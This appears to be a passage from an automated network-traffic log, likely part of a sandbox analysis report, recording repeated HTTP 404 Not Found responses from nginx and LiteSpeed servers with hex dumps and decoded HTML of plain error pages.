Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:27:24 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:27:27 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:27:29 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, 